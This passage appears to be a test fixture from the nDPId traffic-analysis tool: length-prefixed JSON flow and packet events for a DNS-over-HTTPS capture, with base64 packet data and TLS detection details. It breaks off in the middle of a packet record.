00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"}
00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHauga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiwxxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"}
00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="}
00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1SPeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"}
00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSmsTNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKUgOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQB